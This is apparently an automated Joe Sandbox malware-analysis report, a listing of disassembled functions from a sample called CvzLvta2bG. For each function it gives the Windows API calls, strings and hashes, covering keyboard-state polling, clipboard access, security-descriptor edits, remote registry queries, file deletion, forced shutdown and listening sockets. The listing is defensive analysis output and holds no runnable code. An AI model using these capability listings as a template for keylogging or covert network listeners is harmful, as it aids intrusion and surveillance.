GetAce.ADVAPI32(?,00000000,?), ref: 00E57D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E57DB1
GetLengthSid.ADVAPI32(?), ref: 00E57DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E57DDD
HeapAlloc.KERNEL32(00000000), ref: 00E57DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E57E05
CopySid.ADVAPI32(00000000), ref: 00E57E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E57E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E57E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E57E77

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c54f72ca4ed4333e88b16d59bcb71625a1e6aab508d7c7820bc6d8204a012204
Instruction ID: 6fd29047cc437333ae1cbb9941836bb328ca63d158f0068df5845346106483a5
Opcode Fuzzy Hash: c54f72ca4ed4333e88b16d59bcb71625a1e6aab508d7c7820bc6d8204a012204
Instruction Fuzzy Hash: 63617971900209AFDF00CFA1EC85AEEBBB9FF04305F048669F955B6291DB319E19CB60

Function 00E6001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E60097
SetKeyboardState.USER32(?), ref: 00E60102
GetAsyncKeyState.USER32(000000A0), ref: 00E60122
GetKeyState.USER32(000000A0), ref: 00E60139
GetAsyncKeyState.USER32(000000A1), ref: 00E60168
GetKeyState.USER32(000000A1), ref: 00E60179
GetAsyncKeyState.USER32(00000011), ref: 00E601A5
GetKeyState.USER32(00000011), ref: 00E601B3
GetAsyncKeyState.USER32(00000012), ref: 00E601DC
GetKeyState.USER32(00000012), ref: 00E601EA
GetAsyncKeyState.USER32(0000005B), ref: 00E60213
GetKeyState.USER32(0000005B), ref: 00E60221

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
Instruction ID: cf13f563b1a5337f0984e072f13cc93c14347db2539b5a4d5ef9c54f06ffe161
Opcode Fuzzy Hash: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
Instruction Fuzzy Hash: 785109209843A829FB35DBA0A8147EBBFF49F123C4F085599C5C2761C3DAA49B8CC761

Function 00E803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E804AC

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E8054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E80822
RegCloseKey.ADVAPI32(00000000), ref: 00E8082F

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: ca2f698e1f734785a9d65070dc13b74e77dff2d25c458b9de4ac72891dc83a15
Instruction ID: efe9a624e5b3d8ac6be923888759cd1b57cf9ad4e9edfa9fde60ac7b3bfff412
Opcode Fuzzy Hash: ca2f698e1f734785a9d65070dc13b74e77dff2d25c458b9de4ac72891dc83a15
Instruction Fuzzy Hash: 40E15F71604200AFCB54EF24C891E6ABBE4EF89314F04996DF84DEB2A2D731ED45CB91

Function 00E783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC

CoInitialize.OLE32 ref: 00E78403
CoUninitialize.OLE32 ref: 00E7840E
CoCreateInstance.OLE32(?,00000000,00000017,00E92BEC,?), ref: 00E7846E
IIDFromString.OLE32(?,?), ref: 00E784E1
VariantInit.OLEAUT32(?), ref: 00E7857B
VariantClear.OLEAUT32(?), ref: 00E785DC

Strings

NULL Pointer assignment, xrefs: 00E784B3
Failed to create object, xrefs: 00E78479, 00E7852F
Invalid parameter, xrefs: 00E784FA

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 9dfc3ad7e78d244e7c0773bdc1f9b739bda05fe3767f6c6490586dcf71ad06e1
Instruction ID: 5502097fe410106ef4fb15bf2aa88fc749cb4491f815a172232a69716bd648a2
Opcode Fuzzy Hash: 9dfc3ad7e78d244e7c0773bdc1f9b739bda05fe3767f6c6490586dcf71ad06e1
Instruction Fuzzy Hash: B761E1706483129FC710DF14DA4CFAAB7E8AF54744F009419F989BB291DB70ED48CB92

Function 00E74164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00E7418B
EmptyClipboard.USER32 ref: 00E74191
GlobalAlloc.KERNEL32(00000002,?), ref: 00E741A6
CloseClipboard.USER32 ref: 00E74245

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: bd6e2da9af2afde42ab9e5f805371e65a78a49e4da8f6d9f166df428491914b5
Instruction ID: 142799d15ed04d29e29f5948a8bb7ad935eee7b4781ca2c985b8228a74d4dff0
Opcode Fuzzy Hash: bd6e2da9af2afde42ab9e5f805371e65a78a49e4da8f6d9f166df428491914b5
Instruction Fuzzy Hash: 6E219F75201614DFDB14AF65EC09B697BA8EF04711F10C029F94AFB2B2DB30AC55CB94

Function 00E637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770

Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32

FindFirstFileW.KERNEL32(?,?), ref: 00E638A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E6394B
MoveFileW.KERNEL32(?,?), ref: 00E6395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E6397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E639B9

Strings

\*.*, xrefs: 00E6384E, 00E63857, 00E6386C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: e255f2b054a9f2f7d575ea9324ab897ba4c57c8f93dab760f4f4d95870eceb89
Instruction ID: 09f6d81ae170f1e02ed671713bf55bae9c0deb8ee3d7837fba6eb988d77fdd98
Opcode Fuzzy Hash: e255f2b054a9f2f7d575ea9324ab897ba4c57c8f93dab760f4f4d95870eceb89
Instruction Fuzzy Hash: 3C519D7184414DAECF05EBA0EA929EEB7B8AF54344F602069E446B71D1EB316F49CF60

Function 00E6F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E6F440
Sleep.KERNEL32(0000000A), ref: 00E6F470
_wcscmp.LIBCMT ref: 00E6F484
_wcscmp.LIBCMT ref: 00E6F49F
FindNextFileW.KERNEL32(?,?), ref: 00E6F53D
FindClose.KERNEL32(00000000), ref: 00E6F553

Strings

*.*, xrefs: 00E6F425

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: baf94cd46f57d4e054450e9c2df576e2b9d4f913944c3b448d278807af3ee531
Instruction ID: 964623a4d7e978b96b6294b22295b3f2b16099936924f049a57c4138f048af7a
Opcode Fuzzy Hash: baf94cd46f57d4e054450e9c2df576e2b9d4f913944c3b448d278807af3ee531
Instruction Fuzzy Hash: 86418D72840219AFCF14EF64EC45AEEBBB4FF04354F105466E819B2191EB309E84CF50

Function 00E13030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_, xrefs: 00E13322
3c, xrefs: 00E13225

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c$_
API String ID: 674341424-4099079164
Opcode ID: 6f7e42db705faed8c3166d5ce7ed9fbd228895ac914636b6e917566c310b5c01
Instruction ID: a419e0110de250ccb48329669b3964455363dd9c0f8d42995ada23d987deb7ca
Opcode Fuzzy Hash: 6f7e42db705faed8c3166d5ce7ed9fbd228895ac914636b6e917566c310b5c01
Instruction Fuzzy Hash: F2229F716083009FD724DF24D881BAFB7E4BF85714F10691DF89AA7292DB71E984CB92

Function 00E15760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E158A5
_memmove.LIBCMT ref: 00E158F5
_memmove.LIBCMT ref: 00E1595B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0747e989401d141ef283909001fba68eee82f161f43e2d23b1a63a1d186eed9e
Instruction ID: 83330af36361e54352d38c2900551e881cdb636c76e25f12088c9d15c73fe97e
Opcode Fuzzy Hash: 0747e989401d141ef283909001fba68eee82f161f43e2d23b1a63a1d186eed9e
Instruction Fuzzy Hash: 8712BA71A00609DFDF04DFA5D981AEEB3F5FF88300F106929E856B7290EB35A994CB50

Function 00E63B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770

Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32

FindFirstFileW.KERNEL32(?,?), ref: 00E63B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E63BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E63BEA
FindClose.KERNEL32(00000000), ref: 00E63C01
FindClose.KERNEL32(00000000), ref: 00E63C0A

Strings

\*.*, xrefs: 00E63B5B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 00ad58f4f9061ac403698062678f019f551a54ccd7135c4209813dbcffe057df
Instruction ID: f283a50d2e666151cad6ac1c5f156160fc32167fe6f62ca89a175ddc16ff0965
Opcode Fuzzy Hash: 00ad58f4f9061ac403698062678f019f551a54ccd7135c4209813dbcffe057df
Instruction Fuzzy Hash: 4F316F714483859FC301EF64D8918AFB7E8AE95304F446D2DF4D5A21D1EB21EE49CB62

Function 00E651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00E587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
Part of subcall function 00E587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
Part of subcall function 00E587E1: GetLastError.KERNEL32 ref: 00E58865

ExitWindowsEx.USER32(?,00000000), ref: 00E651F9

Strings

SeShutdownPrivilege, xrefs: 00E651C9
, xrefs: 00E651E7
@, xrefs: 00E651EC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 516017918a7725fd42d54ea56a0631dbe3fc39987613cb90884ab7963c2d6c07
Instruction ID: 26766122158534653c2a09ec4aff660c225bc60ea90b3dcf6c69f31e70d297ed
Opcode Fuzzy Hash: 516017918a7725fd42d54ea56a0631dbe3fc39987613cb90884ab7963c2d6c07
Instruction Fuzzy Hash: 5801D4327D16116EE7286268BCAAFBA73A89B053C5F202821F957F20E2D9511C048690

Function 00E0FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%, xrefs: 00E0FCF3
pb, xrefs: 00E449B9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: BuffCharUpper
String ID: pb$%
API String ID: 3964851224-1798441486
Opcode ID: 49031f213057b80dabe61eea9a768887b7bee016969e4f8c91f1d08eb17d3800
Instruction ID: 34f648ea102df307e8953346ccc595ed701d003dcac16529b39940f65a1568a9
Opcode Fuzzy Hash: 49031f213057b80dabe61eea9a768887b7bee016969e4f8c91f1d08eb17d3800
Instruction Fuzzy Hash: 24927E70604341DFD724DF14C480BAAB7E1BF89304F14A96DE89AAB392D775EC85CB92

Function 00E76283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E762DC
WSAGetLastError.WSOCK32(00000000), ref: 00E762EB
bind.WSOCK32(00000000,?,00000010), ref: 00E76307
listen.WSOCK32(00000000,00000005), ref: 00E76316
WSAGetLastError.WSOCK32(00000000), ref: 00E76330
closesocket.WSOCK32(00000000,00000000), ref: 00E76344

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6b7963d808428f93fb09edbc00b7362d9d9c8706c3466bf2cd56a794b7be778f
Instruction ID: a89b30c536c64d2462d1dab5a2318e47a258aad38f08a73c4d351c5c19a1f3b6
Opcode Fuzzy Hash: 6b7963d808428f93fb09edbc00b7362d9d9c8706c3466bf2cd56a794b7be778f
Instruction Fuzzy Hash: AE21E171600600AFCB10EF64C845B6EB7E9EF89328F149559F85AB73D2C770AD45CB51

Function 00E15520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01

_memmove.LIBCMT ref: 00E50258
_memmove.LIBCMT ref: 00E5036D
_memmove.LIBCMT ref: 00E50414

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 2da9af3a0904cd8715c133f001c6b5ba03ec21c8e23bc91e73eefa212e61032c
Instruction ID: f6c4ff2d184e7340af1f3b1da92c3901e835a5b07d13d2289210366d7fb847ab
Opcode Fuzzy Hash: 2da9af3a0904cd8715c133f001c6b5ba03ec21c8e23bc91e73eefa212e61032c
Instruction Fuzzy Hash: 7F02C071A00209DFCF04DF64D981AAEBBF5EF84300F549469E84AFB295EB31D994CB91

Function 00E01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00E019FA
GetSysColor.USER32(0000000F), ref: 00E01A4E
SetBkColor.GDI32(?,00000000), ref: 00E01A61

Part of subcall function 00E01290: DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: cf7e3248379f27c3bac016f39d593ada6cfda072d60df4989a3a85c525770271
Instruction ID: bc866b77585c70c0cb0fe34efde1d512845922cb4140e9e9ae42ae7b87425cdd
Opcode Fuzzy Hash: cf7e3248379f27c3bac016f39d593ada6cfda072d60df4989a3a85c525770271
Instruction Fuzzy Hash: F6A13971206544BED729ABA98C48EBB39ACDB82349F24315EF607FD1D2CA219DC1D371

Function 00E6BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E6BCE6
_wcscmp.LIBCMT ref: 00E6BD16
_wcscmp.LIBCMT ref: 00E6BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00E6BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E6BD6C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: f96d1702ec0f2a9b8cd6d2a0c86a65d543ba55f994f749c77260f0c9fa4f9229
Instruction ID: 3703785e8ce49325bef765ce50801dc2de4d33b5dd9a845ddb0ff9871e81a601
Opcode Fuzzy Hash: f96d1702ec0f2a9b8cd6d2a0c86a65d543ba55f994f749c77260f0c9fa4f9229
Instruction Fuzzy Hash: B451AD75A046029FC718DF28E490E9AB7E8EF49364F00551DE95AEB3A2DB30ED44CB91

Function 00E76747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E7679E
WSAGetLastError.WSOCK32(00000000), ref: 00E767C7
bind.WSOCK32(00000000,?,00000010), ref: 00E76800
WSAGetLastError.WSOCK32(00000000), ref: 00E7680D
closesocket.WSOCK32(00000000,00000000), ref: 00E76821

Memory Dump Source

